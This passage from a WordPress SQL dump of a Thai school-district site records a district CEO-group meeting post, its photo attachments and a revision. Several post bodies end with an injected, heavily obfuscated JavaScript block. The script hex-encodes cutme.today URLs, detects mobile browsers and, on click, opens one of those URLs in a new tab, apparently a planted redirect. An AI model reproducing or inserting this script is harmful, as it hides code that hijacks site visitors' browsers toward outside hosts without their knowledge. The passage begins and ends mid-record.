)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ประชุมสามัญ CEO ประจิมโนนคูณ สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1','','publish','closed','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b8%aa%e0%b8%b2%e0%b8%a1%e0%b8%b1%e0%b8%8d-ceo-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%88%e0%b8%b4%e0%b8%a1%e0%b9%82%e0%b8%99%e0%b8%99%e0%b8%84','','','2024-08-06 10:13:16','2024-08-06 03:13:16','',0,'http://pakhaeng.ssk.in.th/?p=520',0,'post','',0),
(521,1,'2024-08-06 08:58:07','2024-08-06 01:58:07','','S__68952135','','inherit','','closed','','s__68952135','','','2024-08-06 08:58:07','2024-08-06 01:58:07','',520,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952135.jpg',0,'attachment','image/jpeg',0),
(522,1,'2024-08-06 08:58:07','2024-08-06 01:58:07','','S__68952101','','inherit','','closed','','s__68952101','','','2024-08-06 08:58:07','2024-08-06 01:58:07','',520,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952101.jpg',0,'attachment','image/jpeg',0),
(523,1,'2024-08-06 08:58:07','2024-08-06 01:58:07','','S__68952085','','inherit','','closed','','s__68952085','','','2024-08-06 08:58:07','2024-08-06 01:58:07','',520,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952085.jpg',0,'attachment','image/jpeg',0),
(524,1,'2024-08-06 08:58:07','2024-08-06 01:58:07','','S__68952108','','inherit','','closed','','s__68952108','','','2024-08-06 08:58:07','2024-08-06 01:58:07','',520,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952108.jpg',0,'attachment','image/jpeg',0),
(525,1,'2024-08-06 08:58:07','2024-08-06 01:58:07','','S__68952130','','inherit','','closed','','s__68952130','','','2024-08-06 08:58:07','2024-08-06 01:58:07','',520,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952130.jpg',0,'attachment','image/jpeg',0),
(526,1,'2024-08-06 08:58:07','2024-08-06 01:58:07','','S__68952132','','inherit','','closed','','s__68952132','','','2024-08-06 08:58:07','2024-08-06 01:58:07','',520,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952132.jpg',0,'attachment','image/jpeg',0),
(527,1,'2024-08-06 08:58:10','2024-08-06 01:58:10','','S__68952140','','inherit','','closed','','s__68952140','','','2024-08-06 08:58:10','2024-08-06 01:58:10','',520,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952140.jpg',0,'attachment','image/jpeg',0),
(528,1,'2024-08-06 08:58:11','2024-08-06 01:58:11','','S__68952145','','inherit','','closed','','s__68952145','','','2024-08-06 08:58:11','2024-08-06 01:58:11','',520,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952145.jpg',0,'attachment','image/jpeg',0),
(529,1,'2024-08-06 08:58:11','2024-08-06 01:58:11','','S__68952158','','inherit','','closed','','s__68952158','','','2024-08-06 08:58:11','2024-08-06 01:58:11','',520,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952158.jpg',0,'attachment','image/jpeg',0),
(530,1,'2024-08-06 08:58:11','2024-08-06 01:58:11','','S__68952163','','inherit','','closed','','s__68952163','','','2024-08-06 08:58:11','2024-08-06 01:58:11','',520,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952163.jpg',0,'attachment','image/jpeg',0),
(531,1,'2024-08-06 08:58:11','2024-08-06 01:58:11','','S__68952155','','inherit','','closed','','s__68952155','','','2024-08-06 08:58:11','2024-08-06 01:58:11','',520,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952155.jpg',0,'attachment','image/jpeg',0),
(532,1,'2024-08-06 08:58:11','2024-08-06 01:58:11','','S__68952149','','inherit','','closed','','s__68952149','','','2024-08-06 08:58:11','2024-08-06 01:58:11','',520,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952149.jpg',0,'attachment','image/jpeg',0),
(533,1,'2024-08-06 08:58:14','2024-08-06 01:58:14','','S__68952167','','inherit','','closed','','s__68952167','','','2024-08-06 08:58:14','2024-08-06 01:58:14','',520,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952167.jpg',0,'attachment','image/jpeg',0),
(534,1,'2024-08-06 08:58:14','2024-08-06 01:58:14','','S__68952182','','inherit','','closed','','s__68952182','','','2024-08-06 08:58:14','2024-08-06 01:58:14','',520,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952182.jpg',0,'attachment','image/jpeg',0),
(535,1,'2024-08-06 08:58:15','2024-08-06 01:58:15','','S__68952183','','inherit','','closed','','s__68952183','','','2024-08-06 08:58:15','2024-08-06 01:58:15','',520,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952183.jpg',0,'attachment','image/jpeg',0),
(536,1,'2024-08-06 08:58:35','2024-08-06 01:58:35','<!-- wp:paragraph -->\n<p>วันที่ 5 สิงหาคม กลุ่ม CEO ประจิมโนนคูณ สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 จัดประชุมสามัญ ประจำปี 2567 ณ โรงเรียนบ้านดินดำเหล่าเสนไต้ นำโดย นางเสน่หา พลโสภา ประธานกลุ่ม CEO ประจิมโนนคูณในการจัดประชุมในครั้งนี้ ได้รับเกียรติจาก นายสุเทพ ศรบุญทอง ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษเขต 1 เป็นประธานพิธีเปิดในครั้งนี้ และได้มอบนโยบายในการจัดการศึกษา ของสำนักงานเขตพื้นที่ และมอบของที่ระลึกให้แก่ ผู้บริหาร คณะครู และบุคลากรทางการศึกษา เพื่อเป็นขวัญและกำลังใจแก่บุคลากรใหม่ที่ได้มาปฏิบัติหน้าที่ ในกลุ่ม CEO ประจิมโนนคูณในปีนี้</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":523,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952085-1024x576.jpg\" alt=\"\" class=\"wp-image-523\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":522,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952101-1024x576.jpg\" alt=\"\" class=\"wp-image-522\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":524,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952108-1024x576.jpg\" alt=\"\" class=\"wp-image-524\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":526,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952132-1024x576.jpg\" alt=\"\" class=\"wp-image-526\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":525,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952130-1024x576.jpg\" alt=\"\" class=\"wp-image-525\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":521,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952135-1024x576.jpg\" alt=\"\" class=\"wp-image-521\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":527,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952140-1024x576.jpg\" alt=\"\" class=\"wp-image-527\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":532,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952149-1024x576.jpg\" alt=\"\" class=\"wp-image-532\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":528,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952145-1024x576.jpg\" alt=\"\" class=\"wp-image-528\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":531,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952155-1024x576.jpg\" alt=\"\" class=\"wp-image-531\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":529,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952158-1024x576.jpg\" alt=\"\" class=\"wp-image-529\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":530,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952163-1024x576.jpg\" alt=\"\" class=\"wp-image-530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":533,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952167-1024x576.jpg\" alt=\"\" class=\"wp-image-533\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":534,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952182-1024x576.jpg\" alt=\"\" class=\"wp-image-534\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":535,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952183-1024x576.jpg\" alt=\"\" class=\"wp-image-535\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ประชุมสามัญ CEO ประจิมโนนคูณ สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1','','inherit','closed','closed','','520-revision-v1','','','2024-08-06 08:58:35','2024-08-06 01:58:35','',520,'http://pakhaeng.ssk.in.th/?p=536',0,'revision','',0),
(538,1,'2024-08-06 11:39:09','2024-08-06 04:39:09','<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"></div>\n<!-- /wp:buttons -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x